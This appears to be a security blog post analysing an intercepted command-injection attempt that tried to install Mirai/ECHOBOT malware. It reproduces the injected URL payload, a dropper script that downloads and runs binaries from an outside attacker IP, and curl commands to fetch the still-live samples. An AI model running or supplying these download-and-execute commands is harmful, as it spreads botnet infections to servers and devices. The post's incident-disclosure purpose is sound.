We intercepted a Command Injection, which came in via a website that we monitor. Note: I’ve removed client specific data from this, and I’m using GENERALIZED URL information to demonstrate what the command was supposed to do. We found the script he was using to try and exploit the server - he was a script kiddie from Russia. (Host was not vulnerable! Keep your sh*t updated!!! Otherwise, this would’ve been a cleanup day, not a post!)
WARNING: EVERYTHING AFTER THIS IS HIGHLY MALICIOUS!!!
www.example.com/location/to/script.extension?wget%20http://145.249(dot)106.241/richard;curl%20-O%20hxxp://145.249(dot)106.241/richard;chmod%20+x richard;sh richard;
This translates to
#Vulnerable Website Executes the following commands server side.
wget hxxp://145.249(dot)106.241/richard; #First download
curl -O hxxp://145.249(dot)106.241/richard; #second download
chmod +x richard; #Make Richard executable
sh richard #Executes the script "richard"
Sometimes hosts block specific commands (like wget and curl, hence run both. Worst that happens is one overwrites the other!)
I pulled that file from their server and found this.
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm; chmod +x ECHOBOT.arm; ./ECHOBOT.arm; rm -rf ECHOBOT.arm
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm4; chmod +x ECHOBOT.arm4; ./ECHOBOT.arm4; rm -rf ECHOBOT.arm4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm5; chmod +x ECHOBOT.arm5; ./ECHOBOT.arm5; rm -rf ECHOBOT.arm5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm6; chmod +x ECHOBOT.arm6; ./ECHOBOT.arm6; rm -rf ECHOBOT.arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm7; chmod +x ECHOBOT.arm7; ./ECHOBOT.arm7; rm -rf ECHOBOT.arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.i686; chmod +x ECHOBOT.i686; ./ECHOBOT.i686; rm -rf ECHOBOT.i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.m68k; chmod +x ECHOBOT.m68k; ./ECHOBOT.m68k; rm -rf ECHOBOT.m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.mips; chmod +x ECHOBOT.mips; ./ECHOBOT.mips; rm -rf ECHOBOT.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241ECHOBOT.mpsl; chmod +x ECHOBOT.mpsl; ./ECHOBOT.mpsl; rm -rf ECHOBOT.mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.ppc; chmod +x ECHOBOT.ppc; ./ECHOBOT.ppc; rm -rf ECHOBOT.ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.sh4; chmod +x ECHOBOT.sh4; ./ECHOBOT.sh4; rm -rf ECHOBOT.sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.spc; chmod +x ECHOBOT.spc; ./ECHOBOT.spc; rm -rf ECHOBOT.spc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.x86; chmod +x ECHOBOT.x86; ./ECHOBOT.x86; rm -rf ECHOBOT.x86
The explanation of these commands is as follows.
If you cannot cd /tmp, try /var/run, else if try /mnt, else if try /root, else try /. If one of those returns true, move onto the next command (wget). If you were studious, you may have noticed a typo in this guys script. It tries one version, then deletes itself. Try them all. He’d have a listener listening until one of the ECHOBOT’s reported back.
Of course, these are just simple wget functions! We can download that as well!
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)arm
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)arm4
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)arm5
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)arm6
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)arm7
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)i686
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)m68k
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)mips
curl -O hxxp://145(dot)249(dot)106(dot)241ECHOBOT(dot)mpsl
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)ppc
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)sh4
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)spc
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)x86
What do these files reveal? None other then Mirai, the backdoor/botnet!
Good attempt, but failed miserably. To date, we’d (my company) had never been able to grab a live sample of Mirai. Today, I managed to grab it as it happened! Cheers to the IPS/IDS product that successfully detected and blocked the exploit attempt!
As of writing this post, those links are still live! You have been warned!